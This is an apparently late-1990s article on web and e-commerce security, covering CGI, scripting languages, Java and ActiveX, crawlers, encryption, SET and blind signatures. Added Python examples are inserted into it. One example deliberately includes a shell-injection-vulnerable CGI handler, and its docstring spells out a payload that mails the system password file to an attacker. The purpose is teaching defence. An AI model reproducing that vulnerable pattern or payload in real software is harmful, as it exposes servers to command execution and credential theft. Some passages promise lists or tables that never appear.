How secure is Web software and internet commerce?
by Mageshkumar.


Abstract

Today the worldwide web is the most prominent example of distributed information, electronic commerce (transactions) and publishing. It can be simultaneously global and local, complex and easily extensible, corporate and personal. The basic tools and organisation available allow anything from a simple single-site setup to a link into the worldwide community.

Despite this ease of connection to the WWW and of access to the prodigious amount of information held on servers distributed around the world, inadequate security is the biggest obstacle to making the internet a commercial market place. With frequent news of security breaches on the net, it is understandable that many businesses and companies are uneasy about conducting their transactions online.

This article consequently analyses these security concerns and some of the software techniques available to address them. More specifically, the insecurity of existing and new internet programming languages is investigated, together with the risk posed to the net by software such as worms. The software methods at hand, such as encryption, are then discussed. Finally, two common internet services, electronic mail and an online commerce example, online banking, are briefly described.


Overview

The trend towards information distribution

Issues of security w.r.t. web software

Other security risks caused by malicious software

Internet Commerce - Security

Electronic Banking

Security in electronic mail

References


The trend towards information distribution

The meteoric rise of computer networks has ignited a corresponding rise of interest in distributed computing. This discipline is concerned with software, i.e. programs, information and data, held across multiple connected computers that may be widely spread. Distributed computing includes issues of interprocess communication, concurrent processing, data sharing and replication, and security.

By implementing several protocols for information and resource sharing, the above issues were satisfactorily met. They consist chiefly of:

Although the internet is the best known distributed environment, it is only in the early stages of using the full potential of distributed computing. The existing client/server approach went some way towards allowing many users on different computing platforms to share resources. But until recently, for instance, there was no solution to the problem of dynamically loading an application both efficiently and securely. (Efficiency, security and reliability are the three objectives to be met in distributed environments.)


Issues of security with respect to web software

This can be discussed under two headings:

  • Web scripting languages

  • Internet programming languages.

  1. Web scripting languages

    • CGI scripts

      CGI scripts were the first attempt at network programming. Here, interactive communication between client and server became possible: the client could submit a form to a remote server for processing, say to collect user views. The problem is that the CGI script executes on the server, on behalf of the client, with the server's privileges. This presents problems such as:

      1. if the script itself is not robust, it can crash the server or be driven into unintended behaviour by crafted input.
      2. a malicious, or merely careless, CGI script could
        - mail out the system password file
        - use unauthorised resources
        - get access to privileged information

      Hence the above two problems, together with the performance degradation due to server-side processing, mean that CGI scripts are not necessarily the answer to distributed computing. Perl CGI scripts attempted to improve protection: Perl's taint mode (the -T switch) refuses to use request-derived ('tainted') data in any operation that affects files, directories or processes until the script has explicitly checked it with a pattern match.
      Examples of buggy CGI scripts can be found in the excellent WWW security FAQ, Q34.

      If programs can be downloaded and executed in the browser, can such programs be incorporated directly within HTML documents?

    • JAVASCRIPT and VBSCRIPT are two scripting languages aimed at putting some dynamism into static HTML documents. They were an attempt to off-load some processing onto the client. For example, user input can be validated on the client side, reducing load on the server and the network. (The server must still check the input itself: a client-side check is easily bypassed by anyone who submits the form without running the script.)

      1. Javascript - developed by Netscape Communications Inc. in association with Sun Microsystems Inc. It is quite distinct from Java in many ways. It provides features for manipulating form elements, opening and closing windows, downloading and executing Java applets and ActiveX components, etc.

        As scripts now execute on the client side, the security risk at the client end is greater. There were many security loopholes in earlier versions of Netscape, such as:

        • the ability to trick the user into transferring data from his hard disk to remote servers
        • the ability to expose directory contents and other client-side information
        • monitoring of the locations and resources accessed by a client and exposing them, etc.

        These problems have been fixed in Netscape version 3.0. But one problem still remains, namely the emailing of messages without the user's knowledge.
        More information is available at http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq.html#contents

      2. VBscript - developed by Microsoft as a quick follow-up to Netscape's Javascript. It is closer in design to Visual Basic.

      As CGI has been around for some time, it is understandable that network programmers are wary of moving over to the new scripting languages. Although these employ object-oriented techniques, the unknown bugs that can crop up psychologically deter users from changing over. Furthermore, the incompatibility between Netscape and Microsoft Internet Explorer seems to increase this fear, as clients would be working in a mixed-platform environment. Of course, if the user wants to produce mathematical or scientific documents, it is still necessary to write them in LaTeX/TeX in order to use its wide range of mathematical symbols, and then convert them to HTML.
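      The following is an added example, not code from the original article, showing in one Python CGI-style handler both the server-side CGI problem described under (2) above and the point that client-side script validation cannot be trusted. The form inputs are constructed for the demonstration, and `echo` is assumed as a stand-in for whatever command the real script would run over the submitted field.

```python
"""Added example (not from the original article): a CGI-style handler written
two ways. 'echo' stands in for whatever tool the real script would run over
the submitted field (a grep of a comments file, a mail command, ...).
The inputs below are constructed, not captured traffic."""
import re
import subprocess

# Constructed form submissions. The second is what a form would carry if the
# client-side JavaScript check were skipped and the field typed by hand.
GOOD_INPUT = "bob@example.com"
INJECTED_INPUT = "bob@example.com; echo INJECTED"


def vulnerable_lookup(field):
    """1990s-style CGI: the form field is interpolated into a shell command.
    Metacharacters in the field (';', '|', backticks) are interpreted by
    /bin/sh, so '; mail attacker < /etc/passwd' would run as the server user."""
    cmd = "echo " + field
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.splitlines()


def no_shell_lookup(field):
    """Defence 1: hand the field to the program as an argument vector.
    Nothing parses it as shell syntax, so the whole string is one argument."""
    out = subprocess.run(["echo", field], capture_output=True, text=True)
    return out.stdout.splitlines()


EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_server_side(field):
    """Defence 2: repeat on the server the check the browser script did.
    The client-side check only improves responsiveness; it cannot be trusted."""
    return bool(EMAIL_RE.match(field))


def hardened_lookup(field):
    """Both defences together. Returns None when the input is rejected,
    before any command runs."""
    if not validate_server_side(field):
        return None
    return no_shell_lookup(field)


if __name__ == "__main__":
    print("vulnerable:", vulnerable_lookup(INJECTED_INPUT))  # address, then INJECTED
    print("no shell:  ", no_shell_lookup(INJECTED_INPUT))    # injection text echoed literally
    print("hardened:  ", hardened_lookup(INJECTED_INPUT))    # None
```

      Run the block and compare the three results: the shell form executes the injected command, the argument-vector form treats the whole field as data, and the hardened form never reaches the command at all.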

  2. Internet programming languages

    The latest ones are:

    1. Java
    2. ActiveX

    These were an attempt to solve the problems of distributed computing via the web by improving performance: executable programs are downloaded to the client and executed there.

    • Java - developed by Sun Microsystems Inc.

      Java's unique combination of a programming language, compiler and runtime environment provides a general architecture well suited to addressing the concerns plaguing the computing community. It is portable: special Java executable programs called applets can be automatically downloaded and executed on the client's machine, irrespective of its platform.

      But this ease of downloading and access brings with it considerable security risks to the client. Security in Java is concerned with restricting the freedom of applets to initiate network communication and to access sensitive data on the client machine. Furthermore, security can be enforced by Java-capable browsers by setting the level of access; the Java runtime then allows the applet freedom only up to the set level. The four classes of attack due to executable content in general can be summarised in the table below:

      Most have been fixed in the latest version of Netscape (ver 3.0).
      For more information try http://www.genome.wi.mit.edu/WWW/faqs/www-security-faq.html#contents-Q9

    • ActiveX is an object-embedding technology pursued by Microsoft Corporation in response to Java, aimed at creating plug-ins, or ActiveX controls, for Internet Explorer. Users of PCs running Windows (or a Mac) can run them when they connect to the internet.

      The ActiveX security model is completely different from Java's.

      • Java implements security by restricting the freedom of applets to access data and communicate.

      • ActiveX controls have no restriction on what they can do. Thus the system's security is in the hands of the client. The browser can download controls that have been 'digitally signed' by a certified developer whose signature has been registered with a trusted authority like VeriSign. Hence, if the downloaded control does damage the client's security, the owner of the control is at least identifiable. Users may also download unsigned controls, of course, at their own risk.

      There are problems with this model of security, as can be inferred from the above. The obvious one is unsigned malicious controls downloaded by naive users. What a control can do was shown by the Exploder control, which shuts down Windows systems once downloaded; it was in fact signed, so the signature identified its author but did nothing to stop it. Controls that are difficult to track, for example those that quietly expose sensitive information or plant a virus, are claimed to cause more damage.

It follows that none of the above solutions is risk free; this is the assumption on which software development should be based. Consequently it is very difficult to judge which is better (it is not possible to say whether Java is more secure than ActiveX). New products and versions commonly appear in an attempt to fill security gaps, such as WebCrusader from Gradient Technologies (which authenticates users, and internal and external servers, against a registry, providing fine-grained control), but these too may contain bugs. In view of these risks, developers and network programmers tend to stick to the languages they are used to. For now, Java is in the limelight. Inevitably, if developers want powerful and satisfactory web applications, they face a trade-off against security, and may be left with no choice.


Other security risks caused by malicious software

  • Internet 'worms', also called spiders, robots or wanderers (the term is historical: these are crawler programs, not self-replicating network worms). Their purpose is to wander through the web without human intervention and autonomously extract and index web documents. Information can leak when a crawler reaches and indexes sensitive documents. Their access can be limited by following the Standard for Robot Exclusion (SRE), under which the administrator lists the paths crawlers must not fetch in a robots.txt file at the root of the site. Compliance is voluntary, so this keeps well-behaved crawlers out but is no substitute for access control on the documents themselves.

  • Viruses - the familiar malicious programs, craftily written, which cause a lot of damage to the system once an infected document or program has been downloaded and run.

  • Other types: logic bombs, which are code embedded in legitimate programs that 'explode' when certain conditions are met; Trojan horses, apparently useful programs that contain hidden malicious code; and bacteria, which do no direct damage but overload server resources by replicating exponentially.
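  The following is an added example, not code from the original article, of a crawler that checks the Standard for Robot Exclusion before fetching anything, using the parser in Python's standard library. The robots.txt text, the site name www.example.com and the candidate URLs are all constructed for the demonstration.

```python
"""Added example (not from the original article): a crawler that honours the
Standard for Robot Exclusion using Python's standard-library parser. The
robots.txt text and the list of candidate URLs are constructed for the demo."""
from urllib.robotparser import RobotFileParser

# Constructed robots.txt, as a site administrator might publish it at
# http://www.example.com/robots.txt: everyone is kept out of two directories
# and one named crawler is kept out of the whole site.
ROBOTS_TXT = """\
User-agent: *
Disallow: /private/
Disallow: /cgi-bin/

User-agent: BadBot
Disallow: /
"""

# Constructed candidate links a crawler might have collected from pages.
CANDIDATE_URLS = [
    "http://www.example.com/index.html",
    "http://www.example.com/products/list.html",
    "http://www.example.com/private/salaries.html",
    "http://www.example.com/cgi-bin/survey.pl",
]


def load_rules(text=ROBOTS_TXT):
    """Parse robots.txt text offline. A live crawler would instead call
    rp.set_url("http://www.example.com/robots.txt"); rp.read()."""
    rp = RobotFileParser()
    rp.parse(text.splitlines())
    return rp


def plan_crawl(agent, urls=CANDIDATE_URLS, text=ROBOTS_TXT):
    """Return (allowed, skipped): the URLs `agent` may fetch under the rules,
    and those it must leave alone. The check runs before any request is made;
    the product part of the agent string ("GoodBot/1.0") is what is matched."""
    rp = load_rules(text)
    allowed = [u for u in urls if rp.can_fetch(agent, u)]
    skipped = [u for u in urls if u not in allowed]
    return allowed, skipped


if __name__ == "__main__":
    for bot in ("GoodBot/1.0", "BadBot/2.0"):
        ok, no = plan_crawl(bot)
        print(bot, "fetches", ok, "and skips", no)
```

  A well-behaved crawler skips the private and CGI paths and the banned crawler fetches nothing; a crawler that simply ignores robots.txt would fetch all four, which is why the exclusion standard limits leakage only from robots that choose to obey it.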


Internet Commerce - Security

The WWW is changing the way companies and businesses interact. Already a significant number of companies, such as banks and credit-card companies, see the web as the future tool for conducting business. What will be the most sweeping changes brought on by an electronic economy? Money may no longer be controlled exclusively by central authorities like the U.S. Treasury; in its place will be digital currency or 'cybercash', minted by companies responsible for keeping it secure and valuable. Cash, cheques, coupons, paper forms etc. are all going digital.

But what prevents a majority changeover to this new way of working is security. Four technological issues to be resolved before wide-scale acceptance are:

  • Security: for online transactions, transferring funds, and electronic currency.
  • Authentication: verification of the participants involved in a transaction.
  • Anonymity: to assure that consumers, merchants, and the transactions themselves remain confidential.
  • Divisibility: the size of the denominations of digital currency, in order to carry out high-volume, small-value transactions.

Today there are two basic approaches to securing electronic commerce.

  1. The first focuses on securing servers and network sites to protect their resources by means of 'perimeter security', for example firewalls. A firewall protects a LAN or intranet by being placed between the private network and the other networks to which it is connected. The connection passes through a gateway host on which the firewall is implemented, providing a 'choke point' at which access control is applied. Installing proxy servers enables inside users to reach services outside the perimeter. But a firewall cannot protect against attacks that do not go through it, such as a dial-in modem on an internal machine or a malicious insider.

  2. The second focuses on transaction security.
    This addresses prevention of 'sniffers', authentication of all parties involved in the transaction, message integrity to prevent tampering, and a non-repudiable record of the transaction.

    • Prevention of 'sniffers' means that transaction details, such as credit card numbers exchanged during online purchases, are protected by channel-based and document-based security against eavesdropping. Internet commerce should conform to one of a set of standards which specify how data is communicated during online transactions. The most widely backed standard is the Secure Electronic Transaction standard (SET); it specifies encryption of the data before transmission.

      Encryption is the conversion of plain text into an unintelligible form by means of a reversible transformation based on a translation table or on an algorithm under a key. The three main types of transaction data encryption are:

      • Public key encryption
        uses two keys: a private key known only to its owner, and a public key that the owner can freely distribute. The customer encrypts the data with the merchant's public key; because of the mathematical relationship between the pair, only the merchant can decrypt it, using his private key. The customer's own private key serves the opposite purpose: it signs the data, so that anyone holding his public key can verify that it came from him. (Encrypting with one's own private key, as the scheme is sometimes described, gives no secrecy, since the matching public key is public.) Visa International and Mastercard are spearheading the RSA public key encryption standard, which is further supported by Netscape and Microsoft. Of course the strength of this method depends on how securely the private keys are kept.

      • Private (shared secret) key encryption
        MIT's Kerberos is an example. Here communication between customer and merchant is mediated by a Kerberos server; each of the two parties shares a secret key with the server, which is used to encrypt and protect the data. This method is not as secure as the public-key method and depends on the server not being breached. NetCheque, developed at the Information Sciences Institute of the University of Southern California, uses Kerberos to authenticate signatures on electronic cheques that Internet users have registered with an accounting server.

      • Data Encryption Standard (DES)
        a particular shared-secret cipher (the one Kerberos itself uses) that encodes plain text under a 56-bit key shared by both parties. Unless the shared secret key is compromised, it was claimed that the 56-bit key would take approximately 2,691.49 years to crack on Unix-based computers. That estimate did not survive: in 1998 the Electronic Frontier Foundation's purpose-built machine recovered a DES key by exhaustive search in under three days, so 56-bit keys are no longer adequate for protecting payment data.

    • Since in global internet commerce the parties involved may not know each other, it is necessary to authenticate both parties. The SET standard uses certificate authorities (CAs), trusted third parties such as VeriSign or First Virtual, to vouch for the participants. The CA authenticates clients by issuing them certificates, digitally signed by the CA, which bind the client's identity to his public key. The client can then sign online transactions, such as NetCheques, with the matching private key. SET's dual signature goes further: it links the order information sent to the merchant with the payment instructions sent to the bank, so that each party can verify the whole transaction without seeing the other's part.

    • The third component of the electronic infrastructure is anonymity, which deals with providing privacy for online transactions. The concern arises because electronic commerce involves digital cash: the companies involved could easily accumulate data on client transactions and spending habits in corporate databases, without the client's knowledge. Blind signatures, a technique pursued by DigiCash, provide anonymity for digital cash: the customer disguises ('blinds') the serial number of a coin before the bank signs it and removes the disguise afterwards, so that the signed coin is valid at the bank but the bank cannot trace where it is later spent.
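    The following is an added example, not code from the original article nor from DigiCash, RSA or SET. It uses textbook RSA with tiny fixed primes to show two things from the passages above: which key does what in the public-key scheme of the encryption table (sign with your own private key, encrypt with the recipient's public key, and why encrypting with your own private key hides nothing), and how a Chaum-style blind signature lets a bank sign a coin whose serial number it never sees. The primes, the message value 1234, the coin serial 4242 and the blinding factor 2021 are assumptions chosen for the demonstration; the key sizes are toy values.

```python
"""Added example (not from the original article): textbook RSA with tiny
fixed primes, used only to show which key does what in the public-key scheme
and how a blind signature hides a coin's serial number from the bank.
Key sizes are toy values; real systems use a vetted library and keys of
thousands of bits."""
from math import gcd


def make_keypair(p, q, e=17):
    """Return ((e, n), (d, n)) for the given primes. Assumption: p, q are prime."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be invertible modulo phi(n)")
    d = pow(e, -1, phi)          # modular inverse (Python 3.8+)
    return (e, n), (d, n)


def apply_key(x, key):
    """x ** exponent mod n. The same operation serves as encrypt, decrypt,
    sign and verify; only whose exponent is used differs."""
    exp, n = key
    return pow(x, exp, n)


# ---- the table's scheme: sign with own private key, encrypt with the
#      recipient's public key ----------------------------------------------

def customer_send(m, cust_priv, merch_pub):
    """Customer signs m with his private key, then encrypts message and
    signature under the merchant's public key. m must be below both moduli."""
    sig = apply_key(m, cust_priv)
    return apply_key(m, merch_pub), apply_key(sig, merch_pub)


def merchant_receive(c_msg, c_sig, merch_priv, cust_pub):
    """Merchant decrypts with his private key and checks the customer's
    signature with the customer's public key. Returns (message, signature_ok)."""
    m = apply_key(c_msg, merch_priv)
    sig = apply_key(c_sig, merch_priv)
    return m, apply_key(sig, cust_pub) == m


def eavesdropper_undoes_private_key(x, cust_pub):
    """If the customer merely 'encrypted with his private key', anyone with
    his public key reverses it: that operation authenticates, it does not hide."""
    return apply_key(x, cust_pub)


# ---- blind signature (Chaum's construction, as used by DigiCash) ----------

def blind_serial(serial, r, bank_pub):
    """Customer multiplies the coin serial by r**e so the bank sees only noise.
    r must be coprime to n and is kept secret by the customer."""
    e, n = bank_pub
    if gcd(r, n) != 1:
        raise ValueError("blinding factor must be coprime to n")
    return (serial * pow(r, e, n)) % n


def bank_sign(blinded, bank_priv):
    """Bank signs what it is given (and debits the account); it never sees `serial`."""
    return apply_key(blinded, bank_priv)


def unblind(blind_sig, r, bank_pub):
    """(serial * r**e)**d = serial**d * r mod n, so dividing by r leaves the
    bank's signature on the original serial number."""
    _, n = bank_pub
    return (blind_sig * pow(r, -1, n)) % n


def bank_accepts_coin(serial, sig, bank_pub):
    """When the coin is spent, the bank verifies its own signature but has
    no record linking this serial number to any withdrawal."""
    return apply_key(sig, bank_pub) == serial


if __name__ == "__main__":
    cust_pub, cust_priv = make_keypair(61, 53)
    merch_pub, merch_priv = make_keypair(101, 113)
    c_msg, c_sig = customer_send(1234, cust_priv, merch_pub)
    print(merchant_receive(c_msg, c_sig, merch_priv, cust_pub))   # (1234, True)

    bank_pub, bank_priv = make_keypair(127, 131)
    serial, r = 4242, 2021        # coin number and the customer's secret blinding factor
    coin_sig = unblind(bank_sign(blind_serial(serial, r, bank_pub), bank_priv), r, bank_pub)
    print(bank_accepts_coin(serial, coin_sig, bank_pub))          # True
```

    Two points to take from running it: a tampered signature is rejected by the merchant while the message still decrypts, which is the difference between integrity and secrecy; and the value the bank signs differs from the serial number it later accepts, which is exactly what keeps the withdrawal and the spending unlinkable.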

    Researchers are working on security, authentication and anonymity to produce the collective answers needed to open the flood gates for internet commerce in the next 12 to 24 months. Some people in the industry have taken the cynical view that technical problems, and the growing sophistication of hackers, will keep internet commerce from succeeding. This attitude takes no account of the benefits it can offer, such as 24-hour transactions, cost savings for consumers and merchants, no queueing in banks, etc. These efficiencies will motivate developers towards an electronic commerce world.


    A typical internet commerce application: Electronic Banking

    Electronic banking is the use of the WWW to do everyday bank transactions such as:

    • open a bank account online
    • look through your account via the WWW
    • write electronic cheques online, digitally signed and encrypted using the SET standard
    • remote access to bank account and services

    Banks which offer these include BankNet (the world's first), Hudson Bank, etc. (all based in the U.S.). There are companies which set up the service for banks; for example Summit Research Co., whose electronic banking system includes all the hardware (web server, database server, network hardware) and software for the complete system.


    Security in Electronic Mail

    The email system is the most widely and frequently used network-based service in any distributed system, across all architectures and vendor platforms. Companies must communicate with customers and other businesses, which calls for authentication and confidentiality, the key requirements in email security. There are several schemes for email security on the net. One is Privacy Enhanced Mail (PEM), a draft internet standard for email applications which specifies encryption and digital signing of mail.


    References



    Byte International Magazine
    Issues: Apr 95, Aug 95, Sep 96, Nov 96, Feb 97, Mar 97, May 97

    Network and Internetwork Security: Principles and Practice
    Author: William Stallings

    HTML Sourcebook, 3rd edition
    Author: Ian S. Graham

    The WWW Security FAQ, http://www.genome.wi.mit.edu/WWW/faqs/www-security-faq.html#contents





    Please e-mail suggestions to MageshKumar
    mmp@doc.ic.ac.uk